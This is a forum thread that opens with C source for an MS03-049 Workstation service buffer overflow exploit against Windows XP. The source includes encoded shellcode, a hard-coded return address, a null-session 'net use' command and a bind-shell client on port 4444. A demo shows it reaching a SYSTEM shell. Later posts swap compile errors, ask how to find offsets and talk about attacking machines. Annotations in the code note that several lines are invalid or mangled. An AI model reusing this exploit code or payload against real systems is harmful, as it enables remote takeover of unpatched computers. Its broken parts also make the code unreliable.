
Anarchy

#define ADDR 0x75133776
//`call edi' instruction; tested winxpSP0ru,winxpSP1ru.
// ms03-049 wkksvc.dll buffer overflow exploit (winxp) modified by Firestorm
// + поддержка русского языка в шелле (Russian-language support in the shell)
#include <winsock2.h>
#include <windows.h>
#include <lm.h>
#include <winnls.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <io.h>
#pragma comment(lib,"ws2_32.lib")

/* DEMO

D:CBuilder6PROJECTS349>ntctl-03-49.exe 127.1.1.1
Attacking: 127.1.1.1
net use \\127.1.1.1\ipc$ "" /user:""
Команда выполнена успешно.

Waiting 1s...
Connecting 127.1.1.1:4444...Connected to 127.1.1.1:4444!

Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001.

D:\WINDOWS\system32>whoami
whoami
NT AUTHORITY\SYSTEM

D:\WINDOWS\system32>exit
exit
-> Connection closed...
*/
/* Function-pointer type for NetAddAlternateComputerName, which lives in
 * netapi32.dll and is resolved at run time in ThreadFunc() via
 * GetProcAddress rather than linked through an import library. The
 * AlternateName parameter is the one that receives the oversized buffer.
 * NOTE(review): declared as returning VOID, so the API's status result
 * is discarded by every caller in this file. */
typedef VOID (*MYPROC)(IN LPCWSTR Server OPTIONAL,
IN LPCWSTR AlternateName,
IN LPCWSTR DomainAccount OPTIONAL,
IN LPCWSTR DomainAccountPassword OPTIONAL,
IN ULONG Reserved
);

char overwrite[2045] = "";
char sc[] =
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //like nop
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" //
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAx90"
//'call edi' here

"xebx19x5ex31xc9x81xe9x89xff"
"xffxffx81x36x80xbfx32x94x81xeexfcxffxffxffxe2xf2"
"xebx05xe8xe2xffxffxffx03x53x06x1fx74x57x75x95x80"
"xbfxbbx92x7fx89x5ax1axcexb1xdex7cxe1xbex32x94x09"
"xf9x3ax6bxb6xd7x9fx4dx85x71xdaxc6x81xbfx32x1dxc6"
"xb3x5axf8xecxbfx32xfcxb3x8dx1cxf0xe8xc8x41xa6xdf"
"xebxcdxc2x88x36x74x90x7fx89x5axe6x7ex0cx24x7cxad"
"xbex32x94x09xf9x22x6bxb6xd7x4cx4cx62xccxdax8ax81"
"xbfx32x1dxc6xabxcdxe2x84xd7xf9x79x7cx84xdax9ax81"
"xbfx32x1dxc6xa7xcdxe2x84xd7xebx9dx75x12xdax6ax80"
"xbfx32x1dxc6xa3xcdxe2x84xd7x96x8exf0x78xdax7ax80"
"xbfx32x1dxc6x9fxcdxe2x84xd7x96x39xaex56xdax4ax80"
"xbfx32x1dxc6x9bxcdxe2x84xd7xd7xddx06xf6xdax5ax80"
"xbfx32x1dxc6x97xcdxe2x84xd7xd5xedx46xc6xdax2ax80"
"xbfx32x1dxc6x93x01x6bx01x53xa2x95x80xbfx66xfcx81"
"xbex32x94x7fxe9x2axc4xd0xefx62xd4xd0xffx62x6bxd6"
"xa3xb9x4cxd7xe8x5ax96x80xaex6ex1fx4cxd5x24xc5xd3"
"x40x64xb4xd7xecxcdxc2xa4xe8x63xc7x7fxe9x1ax1fx50"
"xd7x57xecxe5xbfx5axf7xedxdbx1cx1dxe6x8fxb1x78xd4"
"x32x0exb0xb3x7fx01x5dx03x7ex27x3fx62x42xf4xd0xa4"
"xafx76x6axc4x9bx0fx1dxd4x9bx7ax1dxd4x9bx7ex1dxd4"
"x9bx62x19xc4x9bx22xc0xd0xeex63xc5xeaxbex63xc5x7f"
"xc9x02xc5x7fxe9x22x1fx4cxd5xcdx6bxb1x40x64x98x0b"
"x77x65x6bxd6x93xcdxc2x94xeax64xf0x21x8fx32x94x80"
"x3axf2xecx8cx34x72x98x0bxcfx2ex39x0bxd7x3ax7fx89"
"x34x72xa0x0bx17x8ax94x80xbfxb9x51xdexe2xf0x90x80"
"xecx67xc2xd7x34x5exb0x98x34x77xa8x0bxebx37xecx83"
"x6axb9xdex98x34x68xb4x83x62xd1xa6xc9x34x06x1fx83"
"x4ax01x6bx7cx8cxf2x38xbax7bx46x93x41x70x3fx97x78"
"x54xc0xafxfcx9bx26xe1x61x34x68xb0x83x62x54x1fx8c"
"xf4xb9xcex9cxbcxefx1fx84x34x31x51x6bxbdx01x54x0b"
"x6ax6dxcaxddxe4xf0x90x80x2fxa2x04";

// File-scope state shared between main() and ThreadFunc(). main() fills
// host and netuse before the thread starts; the thread fills the payload
// and host-name buffers. No synchronisation is used between the two.
char netuse[100];                              // `net use` command line handed to system()
char exp_buf[2045+4+16+(sizeof sc)];           // narrow payload: filler, gadget address, NOP sled, sc
char ip[30];                                   // target host, narrow copy (at most 24 bytes used)
LPWSTR ipl[60];                                // target host, wide copy; an LPWSTR array used as raw wchar_t storage
DWORD calledi = ADDR;                          // address of the `call edi` gadget placed after the filler
LPWSTR unicodesp0[(2045+4+16+(sizeof sc))*2];  // payload widened via MultiByteToWideChar (same pointer-array oddity as ipl)
char unicode[(2045+4+16+(sizeof sc))*2];       // payload widened by hand in ThreadFunc()
int i = 0;                                     // loop counters kept at file scope
int x = 0;
int len = 0;                                   // not used in the code shown here
HINSTANCE hinstLib;                            // handle of netapi32.dll
MYPROC ProcAddr;                               // NetAddAlternateComputerName, resolved at run time
char *host;                                    // argv[1]
int SP;                                        // service-pack selector; its only assignment in main() is commented out
/*
 * Worker thread started by main(): assembles the oversized AlternateName
 * argument and passes it to NetAddAlternateComputerName on the target host.
 * Reads the file-scope inputs prepared beforehand (host, sc, calledi) and
 * fills the other file-scope buffers; lpParam is not used. Always finishes
 * through ExitThread(0), so the trailing return is never reached.
 *
 * Defender's view: what crosses the wire is a NetAddAlternateComputerName
 * call from a null session (main() opens one with `net use ... /user:""`)
 * carrying a ~2 KB name argument. That call pattern, not the payload bytes,
 * is the stable thing to alert on for MS03-049.
 */
DWORD WINAPI ThreadFunc( LPVOID lpParam )
{
// asm int 3;   (debugger breakpoint, left disabled by the author)
// Narrow copy of the target name; only the first 24 bytes are kept.
_snprintf(ip, 24, "\%s", host);

// netapi32 is loaded dynamically, so the binary carries no import for it.
hinstLib = LoadLibrary("netapi32.dll");

// Payload layout in exp_buf: 2000 x 'A' and 44 x 0x90 as filler,
// then the 4-byte gadget address, a 16-byte NOP sled, then sc
// (copied with its terminating NUL).
memset(overwrite, 0x41, 2000);
memset(overwrite+2000, 0x90, 44);
memcpy(exp_buf, overwrite, 2044);
memcpy(exp_buf+2044, &calledi, 4);
memset(exp_buf+2048, 0x90, 16);
memcpy(exp_buf+2064, sc, sizeof(sc));

// Two wide-character forms of the payload are prepared: `unicode` by
// hand and `unicodesp0` through MultiByteToWideChar.
memset(unicode, 0x00, sizeof(unicode));
// NOTE(review): the statement below assigns to the array object `unicode`
// itself, which is not valid C -- the likely origin of the compile errors
// reported later in the thread. As written, `unicode` stays all-zero (an
// empty wide string) for the second call further down.
for (x = 0, i = 0; i <= sizeof(unicode); x++, i+=2) unicode = exp_buf[x];
// NOTE(review): the final argument is sizeof of an LPWSTR array (a byte
// count of pointers), not the wide-character capacity the API expects.
MultiByteToWideChar(CP_ACP, NULL, exp_buf, sizeof(exp_buf), (unsigned short *)unicodesp0,sizeof(unicodesp0));

// Wide copy of the host name for the Server parameter.
MultiByteToWideChar(CP_ACP, NULL, ip, 30, (unsigned short*)ipl, 60);

if (hinstLib != NULL)
{
// Resolved by name; on failure only a one-line message is printed.
ProcAddr = (MYPROC) GetProcAddress(hinstLib,"NetAddAlternateComputerName");
if (NULL != ProcAddr)
{
// printf("nGetProcAddr: %xn", *ProcAddr);
// The call is made twice, once per prepared encoding.
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicodesp0,NULL,NULL,0);
(ProcAddr)((LPCWSTR)ipl,(const unsigned short *)unicode,NULL,NULL,0);
// Author's note (translated from Russian): it was observed that guessing
// the wrong service pack causes nothing unusual to happen, so both the
// SP0 and SP1 variants are sent in the same run.
}
else printf("procaddr nulln");
FreeLibrary(hinstLib);
} else printf("hinst nulln");
ExitThread(0);
}

/* Print the message to stdout and terminate the process with status 0.
 * Used by shell() on every "connection closed" path; never returns.
 * s: NUL-terminated message (printed verbatim, followed by the file's
 *    usual trailing "n"). */
void err_exit(char *s) {
    fputs(s, stdout);
    fputs("n", stdout);
    exit(0);
}
/*
 * Relay loop between this process's stdin/stdout and a connected TCP
 * socket (main() hands over its connection to port 4444). Never returns:
 * every failure path goes through err_exit(), which exits the process.
 *
 * sock: a connected Winsock socket descriptor.
 */
void shell(int sock) {
int l;
char buf[512];
struct timeval time;            // 1 s poll interval, reused on every iteration
unsigned long ul[2];            // hand-built single-entry fd_set (see loop body)

time.tv_sec=1;
time.tv_usec=0;

while (1) {
// ul mimics the Winsock fd_set layout {fd_count, fd_array[]} with one
// entry; FD_ZERO/FD_SET would be the portable spelling.
// NOTE(review): this only lines up where SOCKET and unsigned long have
// the same width, i.e. 32-bit builds.
ul[0]=1;
ul[1]=sock;

// Wait up to 1 s for data on the socket (Winsock ignores the nfds argument).
l=select(0,(fd_set *)&ul,NULL,NULL,&time);
if(l==1) {
// Socket readable: forward one chunk to stdout.
l=recv(sock,buf,sizeof(buf),0);
if (l<=0) {
err_exit("-> Connection closed...n");
}
l=write(1,buf,l);
if (l<=0) {
err_exit("-> Connection closed...n");
}
}
else {
// No socket data within the timeout (or select failed): block on stdin
// and forward whatever the user typed. Socket output is not relayed while
// this read() is blocking.
l=read(0,buf,sizeof(buf));
if (l<=0) {
err_exit("-> Connection closed...n");
}
l=send(sock,buf,l,0);
if (l<=0) {
err_exit("-> Connection closed...n");
}
}
}
}

/*
 * Entry point. argv[1] is the target host name or address. Sequence:
 *   1. open a null IPC$ session to the host with `net use` through system();
 *   2. start ThreadFunc (which sends the overflow) and wait 1 s;
 *   3. connect to TCP port 4444 on the host, where the payload's listener
 *      is expected, and hand the socket to shell().
 * Exits with 1 when the argument is missing; otherwise returns 0 (shell()
 * itself ends the process through err_exit()).
 */
int main(int argc, char **argv) {
DWORD dwThreadId, dwThrdParam = 1;   // dwThrdParam is passed to the thread but never read there
WSADATA tmp;
struct hostent *he;
struct sockaddr_in their_addr;
int sockfd;
if (argc < 2) {
fprintf(stderr, "ms03-049 winxp wkksvc.dll buffer overflow exploit.n");
fprintf(stderr, "Usage: %s <ip>n",argv[0]);
exit(1);
}
// SP=atoi(argv[2]); //unused
host=argv[1];
printf("Attacking: %sn",host);

// Null-session setup. The literal looks mangled in this copy (escapes
// lost); the demo transcript above shows the intended `net use` line.
// NOTE(review): argv[1] is spliced into a system() command line without
// quoting, and `&netuse` has type char (*)[100] where sprintf wants char *.
sprintf(&netuse,"net use \%sipc$ "" /user:""",host);
printf("%sn",netuse);
system(netuse);

// The overflow is sent from a worker thread that is never joined; the
// 1 s sleep is the only ordering between it and the connect below.
CreateThread(NULL,0,ThreadFunc,&dwThrdParam,0,&dwThreadId);
printf("Waiting 1s...");Sleep(1000);
printf("nConnecting %s:%d...",host,4444);

WSAStartup (MAKEWORD(2,0),&tmp);
// NOTE(review): he is dereferenced below without a NULL check, so an
// unresolvable host crashes here instead of reporting an error.
he = gethostbyname(host);

their_addr.sin_family = AF_INET;
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
their_addr.sin_port = htons(4444);
sockfd=socket(AF_INET,SOCK_STREAM,0);   // return value not checked

if(connect(sockfd,(struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
{
printf("Couldnt connect to bindshell.n");
return(0);
}
printf("Connected to %s:%d!nn",host,4444);Sleep(100);
// shell() does not return; the socket and Winsock are never released explicitly.
shell(sockfd);
return(0);
}
WeeDMoNKeY
just trying on some english machines (dont have a russian one) i get errors in the code or someshit. gives me some .c error, compiled wrong? seems to work well other than that... (and yes i got nc.exe in my dir (if its needed)) or maybe it gives the errors when attacking english machines, dont think so though
Anarchy
error?
i tested it on some Chinese machine(winxp)
create null session and send pac success
im finding the ADDR i need now laugh.gif
SLiM577
Ermm good job anarchy im proud of u.
WeeDMoNKeY
i gotta ask, how the (filtered) do you find ret addresses? can someone give me a paper pls? thx.
Kynroxes
erf, good work man !! tks u !!
boshcash
guys i dunno why u keep getting different workstation exploits , now many workstation exploits work (i tried one and worked for xp) , so plz see other exploits like messenger service and the rpc2 , those are more important , because i didnt see a working one except DoS at rpc2
Arnie
QUOTE (boshcash @ Dec 11 2003, 01:18 PM)
guys i dunno why u keep getting different workstation exploits , now many workstation exploits work (i tried one and worked for xp) , so plz see other exploits like messenger service and the rpc2 , those are more important , because i didnt see a working one except DoS at rpc2

shutup or write one yourself (nofi) smile.gif
Anarchy
if i wanna hack some machine
one of the Exploits is enough
but if wanna study
i think i may see more exploits
DJVASTVASTY2K
Hello M8's

Thanks 4 This Anarchy

Great Work There Bud

Nice 2 See Some Work Station Exp

I Compiled But Got Errors

But Thanks For Compiling It Man

Best Regards

Adam

Vast Gsm
WeeDMoNKeY
i had trouble compiling also, but im really wondering on how to find offsets more than anything, anyone have a paper i can read on "how to"?
FLAT
i will test it

thx
flame
seems to be an error here is a snapshot
WeeDMoNKeY
aye flame, thats exactly the error i was talking about getting.
320X
is not a casuality...
mad.gif
WeeDMoNKeY
huh ?
is not a casuality... ?
how does that have anything to do with this?
teest
thanks
DJVASTVASTY2K
I Had The Same Error Too

Anyone Debugged This Successfully.

Best Regards

Adam

Vast Gsm
xaph
yo I get the same error message ... :-(

could someone debug, fix and reup it?

thx. greetz xaph
Anarchy
error?
xaph
brrr only works for chinese folks... :-)
flame
well....
did we move on ?
lets make this work guys,
i hit him high you hit him low
Alex Trust
thnx will try and compile it smile.gif
PegHorse
Good work thanks man !
Zero-X
maybe a noob question.. but what's the port to check for tongue.gif:P ?

-ZX